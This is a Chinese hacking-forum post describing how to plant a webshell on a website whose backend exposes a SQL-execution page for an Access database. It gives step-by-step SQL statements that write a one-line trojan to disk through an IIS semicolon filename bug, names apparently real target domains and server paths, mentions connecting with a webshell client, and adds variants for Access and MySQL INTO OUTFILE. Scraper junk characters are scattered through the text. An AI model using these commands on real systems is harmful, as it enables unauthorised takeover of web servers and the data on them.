找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1917|回复: 0
打印 上一主题 下一主题

ACCESS执行SQL命令导出一句话SHELL

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:53:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好不容易进了后台,发现啥上传啊。备份啊多木有。: t; k! H6 G7 G2 B2 m/ H
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
. t8 n( Z( ]; t8 F  }文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
1 \7 Y+ A5 L% S3 _" `! b然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:; h5 \9 b) T9 ]
1.create table cmd (a varchar(50))
( r# ?2 c/ m/ r  X/ h  t7 e5 o3 v2.insert into cmd (a) values (‘‘)
- P4 s4 i& D/ r0 u" J3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd: Q0 ^: v( N4 Z7 y$ z' O; ]) t4 ^- {
(把表cmd的内容导出为物理路径的一个EXCEL文件)6 p% ^: t; `- F# y
4.drop table cmd5 N3 I( \4 {' V* T4 L
利用IIS的BUG成功拿到了WEBSHELL。
' ^* o6 J- ~, B0 ?4 f6 D! q
7 ]9 [% `* n8 Y) V: m; ^) u直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话% _+ k$ j/ \* `

' K1 c6 Y" N8 v6 C  SQL语句意思解释:
# @$ Y8 o' u, r+ ^0 W# C  第一句+ J: U3 R. l$ d- q& G
  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
$ e4 U+ v$ b! p* h  j& ?% b# r; C( A; F- A. ^; J
  第二句* q' |; J7 }. U! J
  在表cmd的a字段插入一句话木马! p3 T% {$ O7 U; Y( F# a
  第三句
' V& k1 e" m- h( a( a1 t  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件9 a% y3 ?+ U7 z2 k8 H' C
& H8 r, G$ E4 X. X
  第四句
, y6 M1 l( R9 }. o  删除建立的cmd表$ L' I' }$ i( U1 k
* Y8 s3 J8 U' \6 D1 P
  以下内容为测试:
5 ]- p/ B9 s! `- g+ j  Access利用后台SQL执行命令功能导出WebShell:
1 S6 Q, G* v- N. q) v  这个更简单:
. L5 y% @$ u+ @0 {8 V" ?4 z2 a  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]6 X- e+ x& P/ S: S6 Q9 a# }* u/ R
  或者
8 g4 J2 T3 q. ^+ T, }  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]$ r, L" A5 ]: I1 @: ]( q( Y/ T

1 M: M' G7 m$ L: n2 U3 S  后台有执行SQL语句功能(vote为已知表段)
( S" \  \0 [2 [  希望对大家有所帮助拿shell的又一个思路: ]( O! b; J" \' K; T: b
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表